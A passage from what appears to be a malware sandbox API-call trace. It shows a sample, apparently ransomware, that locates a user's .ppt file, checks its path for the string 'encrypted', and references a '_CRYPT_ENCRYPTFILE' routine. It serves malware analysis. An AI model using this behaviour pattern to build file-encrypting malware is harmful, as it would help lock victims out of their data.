hHeap=0x770000) returned 1 [0035.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0035.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0035.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0035.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0035.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0035.451] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.451] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.451] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.452] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x615d42b0, ftCreationTime.dwHighDateTime=0x1d5c5fc, ftLastAccessTime.dwLowDateTime=0xb484a880, ftLastAccessTime.dwHighDateTime=0x1d5bad9, ftLastWriteTime.dwLowDateTime=0xb484a880, ftLastWriteTime.dwHighDateTime=0x1d5bad9, nFileSizeHigh=0x0, nFileSizeLow=0x106e8, dwReserved0=0x0, dwReserved1=0x777648, cFileName="146Rtg30PAl-LzIM9L_.ppt", cAlternateFileName="146RTG~1.PPT")) returned 0x7c20c0 [0035.452] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0035.452] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.452] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x615d42b0, ftCreationTime.dwHighDateTime=0x1d5c5fc, ftLastAccessTime.dwLowDateTime=0xb484a880, ftLastAccessTime.dwHighDateTime=0x1d5bad9, ftLastWriteTime.dwLowDateTime=0xb484a880, ftLastWriteTime.dwHighDateTime=0x1d5bad9, nFileSizeHigh=0x0, nFileSizeLow=0x106e8, dwReserved0=0x0, dwReserved1=0x777648, cFileName="146Rtg30PAl-LzIM9L_.ppt", cAlternateFileName="146RTG~1.PPT")) returned 0x7c20c0 [0035.452] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0035.452] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="07meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="So66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BBW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BW8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="146Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="46Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Rtg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tg30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="30PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAl-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Al-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LzIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zIM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IM9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M9L_.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.455] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.455] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0035.455] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0035.455] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ppt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ppt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0035.455] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.455] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.455] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.456] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.456] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.456] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt", lpFindFileData=0x6ae7b8 | out: 